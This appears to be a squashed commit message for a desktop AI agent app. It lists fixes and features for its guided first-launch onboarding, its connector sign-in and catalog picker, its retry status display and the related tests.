A profile created with share_auth has no auth.json of its own and signs
in through the root store. Every other credential reader falls back to
the global root; the connector gate read HERMES_HOME/auth.json directly,
saw nothing, and stripped manage_connections from the profile's tool
list, so the welcome chat's agent truthfully reported the tool missing.
The gate now goes through get_provider_auth_state.
* fix(agent): name a provider retry backoff on the live status line
The retry status is buffered and replays only when every retry fails, so
during a 60s backoff after a 5xx the user saw a bare spinner. Right after
a connector sign-in landed this read as the agent going silent. The
backoff now also rewrites the live wait notice, which the desktop already
renders in the thread status row; it is transient and clears on recovery.
* test(desktop): connector rehearsal launcher and flagged connector spec
connector-rehearsal.mjs starts the real desktop and backend under a fresh
HERMES_HOME with no copied credentials, a fixed Vite port and CDP on 9344,
so the onboarding connector flow can be driven end to end by hand or from
outside. The Playwright spec covers the flagged connector step.
* fix(desktop): send the agent back into wait when the user keeps waiting after a timeout
The card's Keep waiting re-entered the poll but the agent's own wait had
timed out too and nothing told it to go back in, so it would start
talking mid-authorization. keepWaiting now fires onWaiting like connect
does. Tests also pin that an expired or revoked grant asks the gateway
for reconnect, not connect.
* style(desktop): blank lines in connector-flow test per lint
* feat(desktop): HERMES_SKIP_INTRO=1 / --skip-intro skips the first-run film
The intro is a one-time reveal, so anyone rehearsing the guided chat behind
it sits through it on every fresh HERMES_HOME. The flag rides the existing
launch-flags path (main → preload → renderer) next to guestOnboarding and
only gates isIntroRevealEnabled; the backend never sees it. The rehearsal
launcher sets it.
* fix(desktop): onboarding card Continue stays Done after the transcript rebuilds
The card kept its Done flag in component state. The hidden submit and the
turn-end hydrate both rebuild the message list, so the card remounted with
the flag false and Continue came back live, letting a step be answered
twice. The committed steps now live with the other onboarding answers,
keyed by step, and the first-build chip pick rides the same store.
remember_onboarding projects by key, so the new field never reaches USER.md.
* fix(desktop): no provider picker or free-tier chip over the guided first launch
Two sign-in surfaces leaked into the guide. A credential probe on the
setup profile (a free-tier token mid refresh, a session before its runtime
settled) hit requestDesktopOnboarding and dropped the provider picker over
the chat the user was in; and the statusbar free-tier chip sat there
offering a second sign-in the whole time. Both now yield while the gate
phase is cinematic, guided or handoff. The free tier is the provider for
those phases, and the guide offers sign-in on its own ready screen.
* fix(desktop): onboarding connector picks are real catalog slugs
The picker offered Spotify, GitHub and Stripe, none of which the deployed
connector catalog carries, and spelled Calendar and Drive with hyphens the
gateway does not use. A pick the build chat could not honour ended as
"Spotify isn't in the connector list" after the user had been told to
expect it. The list is now twelve slugs from the live status catalog,
spelled as the gateway spells them; GitHub is out (the terminal has git
and gh), chat channels stay on Messaging. Marks for the new entries; the
Google marks answer both spellings. The build runbook offers the picked
connections in its first turn rather than after the work is underway.
* fix(desktop): the free-tier ready screen never interrupts the guided chat
A readiness round fires when the layout pick assembles the window, and it
raised the free-tier ready screen over the conversation: the user was
dropped into the main app, dismissed it, and came back to a card they had
already answered. The guide is the introduction. The ready screen now
yields while the gate is cinematic, guided or handoff, and the notice is
acked the moment the guided chat takes the screen, not only when the film
does, so a skipped film no longer leaves it pending.
* feat(desktop): tour options that lead to building, and a fork that follows the tour
"Just the basics" and "Show me around" read as a click-through with no
exit; "I'll figure it out" read as declining help. Now Quick tour, Show me
everything, and Skip, let's build something. The script also folds the
fork into the same turn as the tour, so when the user closes the overlay
the next ask is already waiting instead of a transcript that ends on the
tour call.
* feat(desktop): the onboarding connector picker reads the live catalog
A hardcoded list, however carefully copied from today's catalog, is the
next drift. The picker now asks connectors.list through the same
session-owned RPC the connector cards use and offers exactly what the
gateway carries: a curated lead order puts the everyday apps first, chat
channels stay on Messaging, everything else is reachable by search. The
picks are gateway slugs, handed straight to manage_connections. No
catalog (toolset off, gateway unreachable) ends the step honestly with
Skip instead of inventing apps.
* test(desktop): the guided first launch never forces a sign-in
The acceptance criterion the guided onboarding was built to, as a test:
while the gate is cinematic, guided or handoff, the provider picker does
not open and a credential warning is dropped rather than deferred to the
next send. Outside the guide the picker opens as before. Red against the
tree before the guards landed (6 of 9).
* fix(desktop): a relaunch mid-guide resumes the guide, in the guide's shape
Closing the app during the guided first launch and reopening it booted the
normal shell around the persisted solo layout: the connecting splash, the
stock composer and model picker, a small window whose sidebars would not
open, while the gate still read guided. The gate now queues a kickoff for
the guided phase too (the kickoff adopts the existing guide chat by title),
takes the solo shape before the gateway opens rather than after, and the
connecting overlay yields to the guide's own opening. A typed reply in the
composer now closes an ask card and the first-build chips the same way a
click does; the layout card's Continue comes back Done.
* style(desktop): one answeredAfter helper for the ask card and first-build chips
* fix(desktop): the guide takes its shape on the tick the film ends, not after the window shows
Between the film and the greeting the full-size shell painted for a beat:
finishIntroReveal showed the main window, then the kickoff shrank it once
the setup profile answered. The listener on the intro's hidden edge now
takes the guide's shape (solo layout + small centred window) synchronously,
so the window is already the guide when it is shown. One takeGuideShape
owns the pair; kickoff and the boot gate call it idempotently.
* style(desktop): the 'nothing connects yet' line reads first on the connectors card